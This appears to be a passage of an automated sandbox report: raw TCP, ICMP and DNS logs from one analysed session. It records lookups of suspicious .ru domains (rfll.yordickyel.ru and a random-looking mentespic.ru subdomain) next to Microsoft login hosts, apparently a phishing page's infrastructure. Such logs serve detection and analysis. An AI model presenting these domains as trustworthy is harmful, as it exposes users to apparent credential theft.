                                                                Jan 13, 2025 20:54:55.984251022 CET49738443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:55.984256983 CET44349738104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:55.984360933 CET44349738104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:55.984428883 CET49738443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:55.984432936 CET44349738104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:55.984523058 CET44349738104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:55.984582901 CET49738443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:55.984797001 CET49738443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:55.984807014 CET44349738104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:56.038631916 CET49739443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:56.038741112 CET44349739104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:56.038887024 CET49739443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:56.039197922 CET49739443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:56.039230108 CET44349739104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:56.500474930 CET44349739104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:56.500827074 CET49739443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:56.500896931 CET44349739104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:56.501220942 CET44349739104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:56.501801014 CET49739443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:56.501878023 CET44349739104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:56.502062082 CET49739443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:56.547343969 CET44349739104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:56.632539988 CET44349739104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:56.632606030 CET44349739104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:56.632714987 CET49739443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:56.637156010 CET49739443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:56.637208939 CET44349739104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:00.771349907 CET44349723142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:55:00.771471977 CET44349723142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:55:00.771541119 CET49723443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:55:01.918056965 CET49723443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:55:01.918109894 CET44349723142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:55:06.457566977 CET49781443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:06.457597017 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:06.457859993 CET49781443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:06.458115101 CET49781443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:06.458128929 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:06.908730030 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:06.909086943 CET49781443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:06.909095049 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:06.909373999 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:06.909729958 CET49781443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:06.909780025 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:06.910100937 CET49781443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:06.910186052 CET49781443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:06.910218000 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:06.910309076 CET49781443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:06.910336971 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.169430971 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.169475079 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.169497967 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.169521093 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.169522047 CET49781443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:07.169531107 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.169564962 CET49781443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:07.169569016 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.169614077 CET49781443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:07.171289921 CET49781443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:07.171298027 CET44349781104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.186492920 CET49787443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:07.186511993 CET44349787104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.186592102 CET49787443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:07.186891079 CET49787443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:07.186904907 CET44349787104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.308803082 CET49788443192.168.2.5188.114.96.3
                                                                Jan 13, 2025 20:55:07.308831930 CET44349788188.114.96.3192.168.2.5
                                                                Jan 13, 2025 20:55:07.308902979 CET49788443192.168.2.5188.114.96.3
                                                                Jan 13, 2025 20:55:07.309176922 CET49788443192.168.2.5188.114.96.3
                                                                Jan 13, 2025 20:55:07.309187889 CET44349788188.114.96.3192.168.2.5
                                                                Jan 13, 2025 20:55:07.653867960 CET44349787104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.654364109 CET49787443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:07.654431105 CET44349787104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.654745102 CET44349787104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.655090094 CET49787443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:07.655158997 CET44349787104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.655482054 CET49787443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:07.703330994 CET44349787104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.791894913 CET44349788188.114.96.3192.168.2.5
                                                                Jan 13, 2025 20:55:07.795963049 CET49788443192.168.2.5188.114.96.3
                                                                Jan 13, 2025 20:55:07.795974970 CET44349788188.114.96.3192.168.2.5
                                                                Jan 13, 2025 20:55:07.797091007 CET44349788188.114.96.3192.168.2.5
                                                                Jan 13, 2025 20:55:07.797266960 CET49788443192.168.2.5188.114.96.3
                                                                Jan 13, 2025 20:55:07.802711964 CET49788443192.168.2.5188.114.96.3
                                                                Jan 13, 2025 20:55:07.802793980 CET44349788188.114.96.3192.168.2.5
                                                                Jan 13, 2025 20:55:07.803258896 CET49788443192.168.2.5188.114.96.3
                                                                Jan 13, 2025 20:55:07.815447092 CET44349787104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.815545082 CET44349787104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.815650940 CET49787443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:07.843332052 CET44349788188.114.96.3192.168.2.5
                                                                Jan 13, 2025 20:55:07.846434116 CET49788443192.168.2.5188.114.96.3
                                                                Jan 13, 2025 20:55:07.846451044 CET44349788188.114.96.3192.168.2.5
                                                                Jan 13, 2025 20:55:07.867954969 CET49787443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:55:07.867984056 CET44349787104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:55:07.909342051 CET49788443192.168.2.5188.114.96.3
                                                                Jan 13, 2025 20:55:08.369394064 CET44349788188.114.96.3192.168.2.5
                                                                Jan 13, 2025 20:55:08.369673967 CET44349788188.114.96.3192.168.2.5
                                                                Jan 13, 2025 20:55:08.369721889 CET49788443192.168.2.5188.114.96.3
                                                                Jan 13, 2025 20:55:08.373604059 CET49788443192.168.2.5188.114.96.3
                                                                Jan 13, 2025 20:55:08.373620033 CET44349788188.114.96.3192.168.2.5
                                                                Jan 13, 2025 20:55:08.608798027 CET49796443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:08.608870029 CET44349796188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:08.608952999 CET49796443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:08.609384060 CET49796443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:08.609420061 CET44349796188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:09.085067987 CET44349796188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:09.085568905 CET49796443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:09.085614920 CET44349796188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:09.087090015 CET44349796188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:09.087172985 CET49796443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:09.088735104 CET49796443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:09.088768959 CET49796443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:09.088825941 CET44349796188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:09.088871956 CET49796443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:09.088934898 CET49796443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:09.089332104 CET49801443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:09.089379072 CET44349801188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:09.089456081 CET49801443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:09.089721918 CET49801443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:09.089735031 CET44349801188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:09.572216988 CET44349801188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:09.572604895 CET49801443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:09.572617054 CET44349801188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:09.575690985 CET44349801188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:09.575773954 CET49801443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:09.576088905 CET49801443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:09.576152086 CET44349801188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:09.576745033 CET49801443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:09.576761961 CET44349801188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:09.619476080 CET49801443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:10.152672052 CET44349801188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:10.152760983 CET44349801188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:10.152894974 CET49801443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:10.154159069 CET49801443192.168.2.5188.114.97.3
                                                                Jan 13, 2025 20:55:10.154174089 CET44349801188.114.97.3192.168.2.5
                                                                Jan 13, 2025 20:55:50.276235104 CET50030443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:55:50.276278973 CET44350030142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:55:50.276387930 CET50030443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:55:50.276603937 CET50030443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:55:50.276614904 CET44350030142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:55:50.934295893 CET44350030142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:55:50.934614897 CET50030443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:55:50.934631109 CET44350030142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:55:50.935081005 CET44350030142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:55:50.935350895 CET50030443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:55:50.935425043 CET44350030142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:55:50.978221893 CET50030443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:56:00.833514929 CET44350030142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:56:00.833669901 CET44350030142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:56:00.833867073 CET50030443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:56:01.918205976 CET50030443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:56:01.918241024 CET44350030142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:56:50.339107037 CET50034443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:56:50.339167118 CET44350034142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:56:50.339273930 CET50034443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:56:50.339518070 CET50034443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:56:50.339534044 CET44350034142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:56:50.998497963 CET44350034142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:56:50.999016047 CET50034443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:56:50.999079943 CET44350034142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:56:51.000247955 CET44350034142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:56:51.000539064 CET50034443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:56:51.000729084 CET44350034142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:56:51.041034937 CET50034443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:57:00.925900936 CET44350034142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:57:00.926094055 CET44350034142.250.185.228192.168.2.5
                                                                Jan 13, 2025 20:57:00.926167011 CET50034443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:57:01.917987108 CET50034443192.168.2.5142.250.185.228
                                                                Jan 13, 2025 20:57:01.918025970 CET44350034142.250.185.228192.168.2.5
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 13, 2025 20:54:45.616683006 CET53506111.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:45.617258072 CET53498851.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:45.688950062 CET53606481.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:46.936176062 CET53506481.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:47.022916079 CET5305453192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:47.023062944 CET6459853192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:47.129986048 CET53530541.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:47.155550957 CET53645981.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:48.536793947 CET5470053192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:48.536916971 CET5159653192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:48.537436962 CET6058953192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:48.537625074 CET5235453192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:48.537961006 CET5770053192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:48.538093090 CET5373753192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:48.543677092 CET53515961.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:48.543855906 CET53547001.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:48.544161081 CET53523541.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:48.544306993 CET53605891.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:48.544605017 CET53577001.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:48.544653893 CET53537371.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:49.429617882 CET5624953192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:49.429963112 CET6001453192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:49.434509039 CET5746953192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:49.434848070 CET5511653192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:49.436878920 CET53600141.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:49.437447071 CET53562491.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:49.441204071 CET53574691.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:49.441854000 CET53551161.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:49.874874115 CET5823853192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:49.875123978 CET6487353192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:49.882623911 CET53582381.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:49.882711887 CET53648731.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:50.214505911 CET5700553192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:50.214893103 CET6008953192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:50.221431017 CET53570051.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:50.222548008 CET53600891.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:50.686846972 CET53618121.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:55:03.877765894 CET53501261.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:55:07.182883024 CET4964453192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:55:07.183398962 CET6102853192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:55:07.283068895 CET53496441.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:55:07.347537041 CET53610281.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:55:08.406984091 CET6289553192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:55:08.407370090 CET6546553192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:55:08.410854101 CET5632353192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:55:08.410983086 CET6022253192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:55:08.551158905 CET53602221.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:55:08.607930899 CET53563231.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:55:09.447541952 CET6265853192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:55:09.447866917 CET5952753192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:55:09.457031012 CET53595271.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:55:13.271862984 CET5974953192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:55:13.272008896 CET5590053192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:55:22.673767090 CET53536041.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:55:45.254925013 CET53512151.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:55:45.599926949 CET53643091.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:56:14.183602095 CET5027653192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:56:14.183712959 CET5869553192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:56:15.002953053 CET53618571.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:57:02.033716917 CET53535331.1.1.1192.168.2.5
                                                                TimestampSource IPDest IPChecksumCodeType
                                                                Jan 13, 2025 20:54:47.155654907 CET192.168.2.51.1.1.1c27d(Port unreachable)Destination Unreachable
                                                                Jan 13, 2025 20:55:07.347630978 CET192.168.2.51.1.1.1c2ad(Port unreachable)Destination Unreachable
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 13, 2025 20:54:47.022916079 CET192.168.2.51.1.1.10x8c1Standard query (0)rfll.yordickyel.ruA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:47.023062944 CET192.168.2.51.1.1.10x82bcStandard query (0)rfll.yordickyel.ru65IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.536793947 CET192.168.2.51.1.1.10xfad7Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.536916971 CET192.168.2.51.1.1.10xdf4cStandard query (0)code.jquery.com65IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.537436962 CET192.168.2.51.1.1.10x190bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.537625074 CET192.168.2.51.1.1.10x12deStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.537961006 CET192.168.2.51.1.1.10x3496Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.538093090 CET192.168.2.51.1.1.10x7694Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.429617882 CET192.168.2.51.1.1.10xcd0dStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.429963112 CET192.168.2.51.1.1.10xd25cStandard query (0)code.jquery.com65IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.434509039 CET192.168.2.51.1.1.10xc557Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.434848070 CET192.168.2.51.1.1.10x79b4Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.874874115 CET192.168.2.51.1.1.10x4cb7Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.875123978 CET192.168.2.51.1.1.10xf0c0Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 13, 2025 20:54:50.214505911 CET192.168.2.51.1.1.10x421dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:50.214893103 CET192.168.2.51.1.1.10x2638Standard query (0)www.google.com65IN (0x0001)false
                                                                Jan 13, 2025 20:55:07.182883024 CET192.168.2.51.1.1.10x3254Standard query (0)s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ruA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:55:07.183398962 CET192.168.2.51.1.1.10xb64eStandard query (0)s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru65IN (0x0001)false
                                                                Jan 13, 2025 20:55:08.406984091 CET192.168.2.51.1.1.10x7abcStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:55:08.407370090 CET192.168.2.51.1.1.10xccd2Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                Jan 13, 2025 20:55:08.410854101 CET192.168.2.51.1.1.10x807dStandard query (0)s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ruA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:55:08.410983086 CET192.168.2.51.1.1.10xf70bStandard query (0)s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru65IN (0x0001)false
                                                                Jan 13, 2025 20:55:09.447541952 CET192.168.2.51.1.1.10x7ed7Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:55:09.447866917 CET192.168.2.51.1.1.10x121fStandard query (0)www.office.com65IN (0x0001)false
                                                                Jan 13, 2025 20:55:13.271862984 CET192.168.2.51.1.1.10xcc29Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:55:13.272008896 CET192.168.2.51.1.1.10x2ed3Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                Jan 13, 2025 20:56:14.183602095 CET192.168.2.51.1.1.10x34b8Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:56:14.183712959 CET192.168.2.51.1.1.10x551bStandard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 13, 2025 20:54:47.129986048 CET1.1.1.1192.168.2.50x8c1No error (0)rfll.yordickyel.ru172.67.198.166A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:47.129986048 CET1.1.1.1192.168.2.50x8c1No error (0)rfll.yordickyel.ru104.21.92.210A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:47.155550957 CET1.1.1.1192.168.2.50x82bcNo error (0)rfll.yordickyel.ru65IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.543855906 CET1.1.1.1192.168.2.50xfad7No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.543855906 CET1.1.1.1192.168.2.50xfad7No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.543855906 CET1.1.1.1192.168.2.50xfad7No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.543855906 CET1.1.1.1192.168.2.50xfad7No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.544161081 CET1.1.1.1192.168.2.50x12deNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.544306993 CET1.1.1.1192.168.2.50x190bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.544306993 CET1.1.1.1192.168.2.50x190bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.544605017 CET1.1.1.1192.168.2.50x3496No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.544605017 CET1.1.1.1192.168.2.50x3496No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:48.544653893 CET1.1.1.1192.168.2.50x7694No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.437447071 CET1.1.1.1192.168.2.50xcd0dNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.437447071 CET1.1.1.1192.168.2.50xcd0dNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.437447071 CET1.1.1.1192.168.2.50xcd0dNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.437447071 CET1.1.1.1192.168.2.50xcd0dNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.441854000 CET1.1.1.1192.168.2.50x79b4No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.882623911 CET1.1.1.1192.168.2.50x4cb7No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.882623911 CET1.1.1.1192.168.2.50x4cb7No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.882711887 CET1.1.1.1192.168.2.50xf0c0No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.901161909 CET1.1.1.1192.168.2.50x4239No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:49.901161909 CET1.1.1.1192.168.2.50x4239No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:50.221431017 CET1.1.1.1192.168.2.50x421dNo error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:54:50.222548008 CET1.1.1.1192.168.2.50x2638No error (0)www.google.com65IN (0x0001)false
                                                                Jan 13, 2025 20:55:07.283068895 CET1.1.1.1192.168.2.50x3254No error (0)s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:55:07.283068895 CET1.1.1.1192.168.2.50x3254No error (0)s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                Jan 13, 2025 20:55:07.347537041 CET1.1.1.1192.168.2.50xb64eNo error (0)s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru65IN (0x0001)false
                                                                Jan 13, 2025 20:55:08.414048910 CET1.1.1.1192.168.2.50x7abcNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 13, 2025 20:55:08.414688110 CET1.1.1.1192.168.2.50xccd2No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
